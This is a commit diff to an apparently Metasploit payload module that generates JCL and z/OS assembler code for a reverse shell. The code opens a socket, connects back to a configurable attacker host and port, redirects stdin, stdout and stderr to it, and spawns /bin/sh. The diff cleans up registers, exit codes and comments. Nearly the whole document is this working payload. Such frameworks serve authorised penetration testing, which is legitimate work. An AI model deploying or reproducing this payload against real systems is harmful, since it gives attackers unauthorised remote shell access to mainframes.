Land #9027, Cleanup revshell for zos
Brent Cook
commit
7292ee24a2
|
|
@ -13,7 +13,7 @@ require 'msf/base/sessions/mainframe_shell'
|
||||||
require 'msf/base/sessions/command_shell_options'
|
require 'msf/base/sessions/command_shell_options'
|
||||||
|
|
||||||
module MetasploitModule
|
module MetasploitModule
|
||||||
CachedSize = 9973
|
CachedSize = 8993
|
||||||
include Msf::Payload::Single
|
include Msf::Payload::Single
|
||||||
include Msf::Payload::Mainframe
|
include Msf::Payload::Mainframe
|
||||||
include Msf::Sessions::CommandShellOptions
|
include Msf::Sessions::CommandShellOptions
|
||||||
|
|
@ -41,7 +41,7 @@ module MetasploitModule
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
# need these defaulted so we can manipulate them in command_string
|
# need these defaulted so we can manipulate them in command_string
|
||||||
Opt::LHOST('127.0.0.1'),
|
Opt::LHOST('0.0.0.0'),
|
||||||
Opt::LPORT(4444),
|
Opt::LPORT(4444),
|
||||||
OptString.new('ACTNUM', [true, "Accounting info for JCL JOB card", "MSFUSER-ACCTING-INFO"]),
|
OptString.new('ACTNUM', [true, "Accounting info for JCL JOB card", "MSFUSER-ACCTING-INFO"]),
|
||||||
OptString.new('PGMNAME', [true, "Programmer name for JCL JOB card", "programmer name"]),
|
OptString.new('PGMNAME', [true, "Programmer name for JCL JOB card", "programmer name"]),
|
||||||
|
|
@ -81,15 +81,13 @@ module MetasploitModule
|
||||||
|
|
||||||
jcl_jobcard +
|
jcl_jobcard +
|
||||||
"//**************************************/\n" \
|
"//**************************************/\n" \
|
||||||
"//* SPAWN REV SHELL FOR MSF MODULE */\n" \
|
"//* SPAWN REVERSE SHELL FOR MSF MODULE*/\n" \
|
||||||
"//**************************************/\n" \
|
"//**************************************/\n" \
|
||||||
"//* final load module name here\n" \
|
|
||||||
"//SET1 SET PGMN=SPAWNREV\n" \
|
|
||||||
"//*\n" \
|
"//*\n" \
|
||||||
"//STEP1 EXEC PROC=ASMACLG,PARM.L=(CALL)\n" \
|
"//STEP1 EXEC PROC=ASMACLG,PARM.L=(CALL)\n" \
|
||||||
"//L.SYSLIB DD DSN=SYS1.CSSLIB,DISP=SHR\n" \
|
"//L.SYSLIB DD DSN=SYS1.CSSLIB,DISP=SHR\n" \
|
||||||
"//C.SYSIN DD *,DLM=ZZ\n" \
|
"//C.SYSIN DD *,DLM=ZZ\n" \
|
||||||
" TITLE 'spaw rev shell non exec'\n" \
|
" TITLE 'Spanws Reverse Shell'\n" \
|
||||||
"SPAWNREV CSECT\n" \
|
"SPAWNREV CSECT\n" \
|
||||||
"SPAWNREV AMODE 31\n" \
|
"SPAWNREV AMODE 31\n" \
|
||||||
"SPAWNREV RMODE ANY\n" \
|
"SPAWNREV RMODE ANY\n" \
|
||||||
|
|
@ -99,44 +97,35 @@ module MetasploitModule
|
||||||
" USING *,15\n" \
|
" USING *,15\n" \
|
||||||
"@SETUP0 B @SETUP1\n" \
|
"@SETUP0 B @SETUP1\n" \
|
||||||
" DROP 15\n" \
|
" DROP 15\n" \
|
||||||
" DS 0H # half word boundary\n" \
|
" DS 0H # half word boundary\n" \
|
||||||
"@SETUP1 STM 14,12,12(13) # save our registers\n" \
|
"@SETUP1 STM 14,12,12(13) # save our registers\n" \
|
||||||
" LR 2,13 # callers sa\n" \
|
" LR 2,13 # callers sa\n" \
|
||||||
" LR 8,15 # pgm base in R8\n" \
|
" LR 8,15 # pgm base in R8\n" \
|
||||||
" USING @SETUP0,8 # R8 for base addressability\n" \
|
" USING @SETUP0,8 # R8 for base addressability\n" \
|
||||||
"*************************************\n" \
|
"*************************************\n" \
|
||||||
"* set up data area / addressability *\n" \
|
"* set up data area / addressability *\n" \
|
||||||
"*************************************\n" \
|
"*************************************\n" \
|
||||||
"*\n" \
|
" L 0,@DYNSIZE # len of variable area\n" \
|
||||||
" L 0,@DYNSIZE # len of variable area\n" \
|
" GETMAIN RU,LV=(0) # get data stg, len R0\n" \
|
||||||
" GETMAIN RU,LV=(0) # get data stg, len R0\n" \
|
" LR 13,1 # data address\n" \
|
||||||
" LR 13,1 # data address\n" \
|
" USING @DATA,13 # addressability for data area\n" \
|
||||||
" USING @DATA,13 # addressability for data area\n" \
|
" ST 2,@BACK # store callers sa address\n" \
|
||||||
"* XC @DATA(@DATA#LEN),@DATA # zero data area\n" \
|
" ST 13,8(,2) # store our data addr\n" \
|
||||||
" ST 2,@BACK # store callers sa address\n" \
|
" DS 0H # halfword boundaries\n" \
|
||||||
" ST 13,8(,2) # store our data addr\n" \
|
"\n" \
|
||||||
"*************************************\n" \
|
|
||||||
"* set up INHE area / addressability *\n" \
|
|
||||||
"*************************************\n" \
|
|
||||||
"*\n" \
|
|
||||||
"* L 0,=A(INHE#LENGTH) # length of INHE macro\n" \
|
|
||||||
"* GETMAIN RU,LV=(0) # get stg for inhe macro\n" \
|
|
||||||
"* ST 1,@CONSA # save addr inhe macro stg\n" \
|
|
||||||
"* LR 5,1 # R5 has INHE struct address\n" \
|
|
||||||
"* USING INHE,5 # addressability for INHE\n" \
|
|
||||||
" DS 0H # halfword boundaries\n" \
|
|
||||||
"***********************************************************************\n" \
|
"***********************************************************************\n" \
|
||||||
"* BPX1SOC set up socket - inline *\n" \
|
"* BPX1SOC set up socket - inline *\n" \
|
||||||
"***********************************************************************\n" \
|
"***********************************************************************\n" \
|
||||||
" CALL BPX1SOC, X\n" \
|
" CALL BPX1SOC, X\n" \
|
||||||
" (DOM,TYPE,PROTO,DIM,CLIFD, X\n" \
|
" (DOM,TYPE,PROTO,DIM,CLIFD, X\n" \
|
||||||
" RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \
|
" RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \
|
||||||
|
"\n" \
|
||||||
"*******************************\n" \
|
"*******************************\n" \
|
||||||
"* chk return code, 0 or exit *\n" \
|
"* chk return code, 0 or exit *\n" \
|
||||||
"*******************************\n" \
|
"*******************************\n" \
|
||||||
" LHI 15,2\n" \
|
" LHI 15,2\n" \
|
||||||
" L 6,RTN_VAL\n" \
|
" L 7,RTN_VAL\n" \
|
||||||
" CIB 6,0,7,EXITP # R6 not 0? Time to exit\n" \
|
" CIB 7,0,7,EXITP # R7 not 0? Time to exit\n" \
|
||||||
"\n" \
|
"\n" \
|
||||||
"***********************************************************************\n" \
|
"***********************************************************************\n" \
|
||||||
"* BPX1CON (connect) connect to remote host - inline *\n" \
|
"* BPX1CON (connect) connect to remote host - inline *\n" \
|
||||||
|
|
@ -153,8 +142,8 @@ module MetasploitModule
|
||||||
"* chk return code, 0 or exit *\n" \
|
"* chk return code, 0 or exit *\n" \
|
||||||
"*******************************\n" \
|
"*******************************\n" \
|
||||||
" LHI 15,3\n" \
|
" LHI 15,3\n" \
|
||||||
" L 6,RTN_VAL\n" \
|
" L 7,RTN_VAL\n" \
|
||||||
" CIB 6,0,7,EXITP # R6 not 0? Time to exit\n" \
|
" CIB 7,0,7,EXITP # R7 not 0? Time to exit\n" \
|
||||||
"\n" \
|
"\n" \
|
||||||
"*************************************************\n" \
|
"*************************************************\n" \
|
||||||
"* order of things to prep child pid *\n" \
|
"* order of things to prep child pid *\n" \
|
||||||
|
|
@ -172,9 +161,10 @@ module MetasploitModule
|
||||||
"****************************************************\n" \
|
"****************************************************\n" \
|
||||||
"* chk return code here anything but -1 is ok *\n" \
|
"* chk return code here anything but -1 is ok *\n" \
|
||||||
"****************************************************\n" \
|
"****************************************************\n" \
|
||||||
" LHI 15,11 # exit code for this func\n" \
|
" LHI 15,4 # exit code for this func\n" \
|
||||||
" L 7,RTN_VAL # set r7 to rtn val\n" \
|
" L 7,RTN_VAL # set r7 to rtn val\n" \
|
||||||
" CIB 7,-1,8,EXITP # r6 = -1 exit\n" \
|
" CIB 7,-1,8,EXITP # R7 = -1 exit\n" \
|
||||||
|
"\n" \
|
||||||
"*******************\n" \
|
"*******************\n" \
|
||||||
"***** STDOUT *****\n" \
|
"***** STDOUT *****\n" \
|
||||||
"*******************\n" \
|
"*******************\n" \
|
||||||
|
|
@ -186,9 +176,10 @@ module MetasploitModule
|
||||||
"****************************************************\n" \
|
"****************************************************\n" \
|
||||||
"* chk return code here anything but -1 is ok *\n" \
|
"* chk return code here anything but -1 is ok *\n" \
|
||||||
"****************************************************\n" \
|
"****************************************************\n" \
|
||||||
" LHI 15,11 # exit code for this func\n" \
|
" LHI 15,5 # exit code for this func\n" \
|
||||||
" L 7,RTN_VAL # set r7 to rtn val\n" \
|
" L 7,RTN_VAL # set r7 to rtn val\n" \
|
||||||
" CIB 7,-1,8,EXITP # r6 = -1 exit\n" \
|
" CIB 7,-1,8,EXITP # R7 = -1 exit\n" \
|
||||||
|
"\n" \
|
||||||
"*******************\n" \
|
"*******************\n" \
|
||||||
"***** STDERR *****\n" \
|
"***** STDERR *****\n" \
|
||||||
"*******************\n" \
|
"*******************\n" \
|
||||||
|
|
@ -200,14 +191,13 @@ module MetasploitModule
|
||||||
"****************************************************\n" \
|
"****************************************************\n" \
|
||||||
"* chk return code here anything but -1 is ok *\n" \
|
"* chk return code here anything but -1 is ok *\n" \
|
||||||
"****************************************************\n" \
|
"****************************************************\n" \
|
||||||
" LHI 15,11 # exit code for this func\n" \
|
" LHI 15,6 # exit code for this func\n" \
|
||||||
" L 7,RTN_VAL # set r7 to rtn val\n" \
|
" L 7,RTN_VAL # set r7 to rtn val\n" \
|
||||||
" CIB 7,-1,8,EXITP # r7 = -1 exit\n" \
|
" CIB 7,-1,8,EXITP # R7 = -1 exit\n" \
|
||||||
|
"\n" \
|
||||||
"***********************************************************************\n" \
|
"***********************************************************************\n" \
|
||||||
"* BP1SPN (SPAWN) execute shell '/bin/sh' *\n" \
|
"* BP1SPN (SPAWN) execute shell '/bin/sh' *\n" \
|
||||||
"***********************************************************************\n" \
|
"***********************************************************************\n" \
|
||||||
"******\n" \
|
|
||||||
"******\n" \
|
|
||||||
" XC INHE(INHE#LENGTH),INHE # clear inhe structure\n" \
|
" XC INHE(INHE#LENGTH),INHE # clear inhe structure\n" \
|
||||||
" XI INHEFLAGS0,INHESETPGROUP\n" \
|
" XI INHEFLAGS0,INHESETPGROUP\n" \
|
||||||
" SPACE ,\n" \
|
" SPACE ,\n" \
|
||||||
|
|
@ -220,46 +210,35 @@ module MetasploitModule
|
||||||
" (EXCMDL,EXCMD,EXARGC,EXARGLL,EXARGL,EXENVC,EXENVLL, X\n" \
|
" (EXCMDL,EXCMD,EXARGC,EXARGLL,EXARGL,EXENVC,EXENVLL, X\n" \
|
||||||
" EXENVL,FDCNT,FDLST,=A(INHE#LENGTH),INHE,RTN_VAL, X\n" \
|
" EXENVL,FDCNT,FDLST,=A(INHE#LENGTH),INHE,RTN_VAL, X\n" \
|
||||||
" RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \
|
" RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \
|
||||||
" LHI 15,12 # exit code for this func\n" \
|
" LHI 15,7 # exit code for this func\n" \
|
||||||
" L 7,RTN_VAL # set r7 to rtn val\n" \
|
" L 7,RTN_VAL # set r7 to rtn val\n" \
|
||||||
" L 6,RTN_COD\n" \
|
" CIB 7,-1,8,EXITP # R7 = -1 exit\n" \
|
||||||
" L 5,RSN_COD\n" \
|
|
||||||
" CIB 7,-1,8,EXITP # r7 = -1 exit\n" \
|
|
||||||
"\n" \
|
"\n" \
|
||||||
"****************************************************\n" \
|
"****************************************************\n" \
|
||||||
"* cleanup & exit *\n" \
|
"* cleanup & exit preload R15 with exit code *\n" \
|
||||||
"* preload R15 with exit code *\n" \
|
|
||||||
"****************************************************\n" \
|
"****************************************************\n" \
|
||||||
"GOODX XR 15,15 # 4 FOR rc\n" \
|
" XR 15,15 # 4 FOR rc\n" \
|
||||||
"* L 0,=A(INHE#LENGTH)\n" \
|
|
||||||
"* L 5,@INHEA\n" \
|
|
||||||
"* DROP 5\n" \
|
|
||||||
"* FREEMAIN RU,LV=(0),A=(5) #free storage\n" \
|
|
||||||
"EXITP L 0,@DYNSIZE\n" \
|
"EXITP L 0,@DYNSIZE\n" \
|
||||||
" LR 1,13\n" \
|
" LR 1,13\n" \
|
||||||
" L 13,@BACK\n" \
|
" L 13,@BACK\n" \
|
||||||
" DROP 13\n" \
|
" DROP 13\n" \
|
||||||
" FREEMAIN RU,LV=(0),A=(1) #free storage\n" \
|
" FREEMAIN RU,LV=(0),A=(1) # Free storage\n" \
|
||||||
" XR 15,15\n" \
|
" L 14,12(,13) # load R14\n" \
|
||||||
" L 14,12(,13) # load R14\n" \
|
" LM 0,12,20(13) # load 0-12\n" \
|
||||||
" LM 0,12,20(13) # load 0-12\n" \
|
" BSM 0,14 # branch to caller\n" \
|
||||||
" BSM 0,14 # branch to caller\n" \
|
|
||||||
"\n" \
|
"\n" \
|
||||||
"**********************\n" \
|
"****************************************************\n" \
|
||||||
"* *\n" \
|
"* Constants and Variables *\n" \
|
||||||
"* Constant Sections *\n" \
|
"****************************************************\n" \
|
||||||
"* *\n" \
|
" DS 0F # constants full word boundary\n" \
|
||||||
"**********************\n" \
|
|
||||||
" DS 0F # constants full word boundary\n" \
|
|
||||||
"F_STDI EQU 0\n" \
|
"F_STDI EQU 0\n" \
|
||||||
"F_STDO EQU 1\n" \
|
"F_STDO EQU 1\n" \
|
||||||
"F_STDE EQU 2\n" \
|
"F_STDE EQU 2\n" \
|
||||||
"*************************\n" \
|
"*************************\n" \
|
||||||
"* Socket conn variables * # functions used by pgm\n" \
|
"* Socket conn variables * # functions used by pgm\n" \
|
||||||
"*************************\n" \
|
"*************************\n" \
|
||||||
"CONNSOCK DC XL2'#{lport}' # LPORT\n" \
|
"CONNSOCK DC XL2'#{lport}' # LPORT\n" \
|
||||||
"CONNADDR DC XL4'#{lhost}' # LHOST\n" \
|
"CONNADDR DC XL4'#{lhost}' # LHOST\n" \
|
||||||
"BACKLOG DC F'1' # 1 byte backlog\n" \
|
|
||||||
"DOM DC A(AF_INET) # AF_INET = 2\n" \
|
"DOM DC A(AF_INET) # AF_INET = 2\n" \
|
||||||
"TYPE DC A(SOCK#_STREAM) # stream = 1\n" \
|
"TYPE DC A(SOCK#_STREAM) # stream = 1\n" \
|
||||||
"PROTO DC A(IPPROTO_IP) # ip = 0\n" \
|
"PROTO DC A(IPPROTO_IP) # ip = 0\n" \
|
||||||
|
|
@ -278,11 +257,8 @@ module MetasploitModule
|
||||||
"EXENVC DC F'0' # env var count\n" \
|
"EXENVC DC F'0' # env var count\n" \
|
||||||
"EXENVL DC F'0' # env var arg list addr\n" \
|
"EXENVL DC F'0' # env var arg list addr\n" \
|
||||||
"EXENVLL DC F'0' # env var arg len addr\n" \
|
"EXENVLL DC F'0' # env var arg len addr\n" \
|
||||||
"EXITRA DC F'0' # exit routine addr\n" \
|
|
||||||
"EXITPLA DC F'0' # exit rout parm list addr\n" \
|
|
||||||
"FDCNT DC F'0' # field count s/b 0\n" \
|
"FDCNT DC F'0' # field count s/b 0\n" \
|
||||||
"FDLST DC F'0' # field list addr s/b 0\n" \
|
"FDLST DC F'0' # field list addr s/b 0\n" \
|
||||||
"MYLEN DC F'0'\n" \
|
|
||||||
"TVER DC AL2(INHE#VER)\n" \
|
"TVER DC AL2(INHE#VER)\n" \
|
||||||
"TLEN DC AL2(INHE#LENGTH)\n" \
|
"TLEN DC AL2(INHE#LENGTH)\n" \
|
||||||
" SPACE ,\n" \
|
" SPACE ,\n" \
|
||||||
|
|
@ -297,22 +273,14 @@ module MetasploitModule
|
||||||
"RTN_COD DS F # return code\n" \
|
"RTN_COD DS F # return code\n" \
|
||||||
"RSN_COD DS F # reason code\n" \
|
"RSN_COD DS F # reason code\n" \
|
||||||
"CLIFD DS F # client fd\n" \
|
"CLIFD DS F # client fd\n" \
|
||||||
"*********************\n" \
|
|
||||||
"* Return value vars *\n" \
|
|
||||||
"*********************\n" \
|
|
||||||
"@SAVE00 DS 0D\n" \
|
|
||||||
" DS A\n" \
|
|
||||||
"@BACK DS A\n" \
|
"@BACK DS A\n" \
|
||||||
"@FORWARD DS A\n" \
|
|
||||||
" DS 15A\n" \
|
|
||||||
"@INHEA DS A\n" \
|
|
||||||
"*\n" \
|
"*\n" \
|
||||||
" BPXYSOCK LIST=NO,DSECT=NO\n" \
|
" BPXYSOCK LIST=NO,DSECT=NO\n" \
|
||||||
" BPXYFCTL LIST=NO,DSECT=NO\n" \
|
" BPXYFCTL LIST=NO,DSECT=NO\n" \
|
||||||
" BPXYINHE LIST=NO,DSECT=NO\n" \
|
" BPXYINHE LIST=NO,DSECT=NO\n" \
|
||||||
"@ENDYN EQU *\n" \
|
"@ENDYN EQU *\n" \
|
||||||
"@DATA#LEN EQU *-@DATA\n" \
|
"@DATA#LEN EQU *-@DATA\n" \
|
||||||
" BPXYCONS LIST=YES\n" \
|
" BPXYCONS LIST=NO\n" \
|
||||||
" END SPAWNREV\n" \
|
" END SPAWNREV\n" \
|
||||||
"ZZ\n" \
|
"ZZ\n" \
|
||||||
"//*\n"
|
"//*\n"
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue